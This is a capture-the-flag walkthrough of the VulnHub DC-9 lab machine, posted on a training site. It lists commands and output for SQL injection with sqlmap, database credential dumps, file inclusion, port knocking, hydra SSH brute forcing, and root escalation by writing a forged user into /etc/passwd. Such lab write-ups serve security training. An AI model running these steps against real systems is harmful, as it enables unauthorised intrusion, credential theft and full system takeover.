CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)

12/01/2025 Shad Hussain Knowledge Views 203 Comments 0 Analytics Video English DMCA Add Favorite Copy Link
CTF Walk Through - DC9 - VulnHub

Machine link : https://www.vulnhub.com/entry/dc-9,412/ STEP1 arp-scan -l FINDING ---------------------------------------------------------------------------------------------------------- STEP2 nmap -p- -Pn -A -T4 -sSV FINDING 22/tcp filtered ssh 80/tcp open http Apache httpd 2.4.38 ((Debian)) ---------------------------------------------------------------------------------------------------------- STEP3 dirb FINDING ---- Scanning URL: ---- == DIRECTORY: == DIRECTORY: + (CODE:200|SIZE:917) + (CODE:403|SIZE:279) ---------------------------------------------------------------------------------------------------------- STEP4 intercept the request in burp copy the request in .txt file on terminal lets sqlmap the request sqlmap -r dc9packet.txt --bds --batch FINDING Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: search=asad UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7871,0x446a484c415156664359744d614d 6979796c54704376496569634b5a7764656b534c495545587269,0x716b626a71), NULL,NULL,NULL-- - --- [01:53:58] [INFO] the back-end DBMS is MySQL web server operating system: Linux Debian 10 (buster) web application technology: Apache 2.4.38 back-end DBMS: MySQL = 5.0.12 (MariaDB fork) [01:53:58] [INFO] fetching database names available databases [3]: [*] information_schema [*] Staff [*] users ---------------------------------------------------------------------------------------------------------- STEP5 to get tables from Staff sqlmap -r dc9packet.txt 3--level=3 -D Staff --tables FINDING Database: Staff [2 tables] +--------------+ | StaffDetails | | Users | +--------------+ ---------------------------------------------------------------------------------------------------------- STEP6 to get data form StaffDetails and Users Tables sqlmap -r dc9packet.txt --level=3 -D Staff -T StaffDetails --columns FINDING Table: StaffDetails [7 columns] +-----------+-----------------+ | Column | Type | +-----------+-----------------+ | position | varchar(100) | | email | varchar(50) | | firstname | varchar(30) | | id | int(6) unsigned | | lastname | varchar(30) | | phone | varchar(20) | | reg_date | timestamp | +-----------+-----------------+ sqlmap -r dc9packet.txt --level=3 -D Staff -T Users --columns FINDING Table: Users [3 columns] +----------+-----------------+ | Column | Type | +----------+-----------------+ | Password | varchar(255) | | UserID | int(6) unsigned | | Username | varchar(255) | +----------+-----------------+ sqlmap -r dc9packet.txt --level=3 -D Staff -T Users -C Password,UserID,Username --dump Database: Staff Table: Users [1 entry] +--------------------------------------------------+--------+----------+ | Password | UserID | Username | +--------------------------------------------------+--------+----------+ | 856f5de590ef37314e7c3bdf6f8a66dc (transorbital1) | 1 | admin | +--------------------------------------------------+--------+----------+ ---------------------------------------------------------------------------------------------------------- STEP7 to get tables from users sqlmap -r dc9packet.txt 3--level=3 -D users --tables FINDING Database: users [1 table] +-------------+ | UserDetails | +-------------+ to get columns form users DATABASE sqlmap -r dc9packet.txt --level=3 -D users -T UserDetails --columns FINDING Database: users Table: UserDetails [6 columns] +-----------+-----------------+ | Column | Type | +-----------+-----------------+ | firstname | varchar(30) | | id | int(6) unsigned | | lastname | varchar(30) | | password | varchar(20) | | reg_date | timestamp | | username | varchar(30) | +-----------+-----------------+ sqlmap -r dc9packet.txt --level=3 -D users -T UserDetails -C firstname,id,lastname,password,reg_date,username --dump Database: users Table: UserDetails [17 entries] +-----------+----+------------+---------------+---------------------+-----------+ | firstname | id | lastname | password | reg_date | username | +-----------+----+------------+---------------+---------------------+-----------+ | Mary | 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | | Julie | 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | | Fred | 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | | Barney | 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | | Tom | 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | | Jerry | 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | | Wilma | 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | | Betty | 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | | Chandler | 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | | Joey | 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | | Rachel | 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | | Ross | 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | | Monica | 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | | Phoebe | 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | | Scooter | 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | | Donald | 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | | Scott | 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | +-----------+----+------------+---------------+---------------------+-----------+ ---------------------------------------------------------------------------------------------------------- STEP8 lets login with admin -- transorbital1 login in at the bottom we find "File does not exist" lets try LFI at its work means LFI is here ---------------------------------------------------------------------------------------------------------- STEP9 FINDING [options] UseSyslog [openSSH] sequence = 7469,8475,9842 seq_timeout = 25 command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn [closeSSH] sequence = 9842,8475,7469 seq_timeout = 25 command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags = syn we find theopen ssh port is 7469,8475,9842 ---------------------------------------------------------------------------------------------------------- STEP10 to open ssh port we use knock 7469 8475 9842 then nmap -p22 ssh port is seen open ---------------------------------------------------------------------------------------------------------- STEP11 make user.txt file form database and password.txt as well hydra -L /root/Desktop/dc9users.txt -P /root/Desktop/dc9userspassword.txt -s 22 ssh FINDING [22][ssh] host: login: chandlerb password: UrAG0D! [22][ssh] host: login: joeyt password: Passw0rd [22][ssh] host: login: janitor password: Ilovepeepee ---------------------------------------------------------------------------------------------------------- STEP12 ssh [email protected] password: UrAG0D! su janitor password: Ilovepeepee cd /home cd janitor ls -la cd .secrets-for-putin ls -la cat passwords-found-on-post-it-notes.txt FINDING BamBam01 Passw0rd smellycats P0Lic#10-4 B4-Tru3-001 4uGU5T-NiGHts ---------------------------------------------------------------------------------------------------------- STEP13 paste this password list in dc9userspassword2.txt and hydra it again with rest of usernames hydra -L /root/Desktop/dc9users.txt -P /root/Desktop/dc9userspassword2.txt -s 22 ssh FINDING [22][ssh] host: login: fredf password: B4-Tru3-001 ---------------------------------------------------------------------------------------------------------- STEP14 ssh [email protected] password: B4-Tru3-001 sudo -l FINDING (root) NOPASSWD: /opt/devstuff/dist/test/test ---------------------------------------------------------------------------------------------------------- STEP15 create a password openssl passwd -1 -salt shad 123456 $1$shad$XWjl/m8zVxYjY.AZYP0F3/ create a file in tmp echo asad:$1$shad$XWjl/m8zVxYjY.AZYP0F3/:0:0::/root:/bin/bash /tmp/raja cd /opt/devstuff/dist/test sudo ./test /tmp/raja /etc/passwd su asad password -- 123456 whoami root ls -la cat theflag.txt ███╗ ██╗██╗ ██████╗███████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██╗██╗██╗ ████╗ ██║██║██╔════╝██╔════╝ ██║ ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║ ██╔██╗ ██║██║██║ █████╗ ██║ █╗ ██║██║ ██║██████╔╝█████╔╝ ██║██║██║ ██║╚██╗██║██║██║ ██╔══╝ ██║███╗██║██║ ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝ ██║ ╚████║██║╚██████╗███████╗ ╚███╔███╔╝╚██████╔╝██║ ██║██║ ██╗██╗██╗██╗ ╚═╝ ╚═══╝╚═╝ ╚═════╝╚══════╝ ╚══╝╚══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝╚═╝ Congratulations - you have done well to get to this point. Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those who have taken the time to complete the various DC challenges. I also want to send out a big thank you to the various members of @m0tl3ycr3w . They are an inspirational bunch of fellows. Sure, they might smell a bit, but...just kidding. :-) Sadly, all things must come to an end, and this will be the last ever challenge in the DC series. So long, and thanks for all the fish. ----------------------------------------------------------------------------------------------------------

Related articles

 WhatsApp no. else use your mail id to get the otp...!    Please tick to get otp in your mail id...!

© mutebreak.com | All Rights Reserved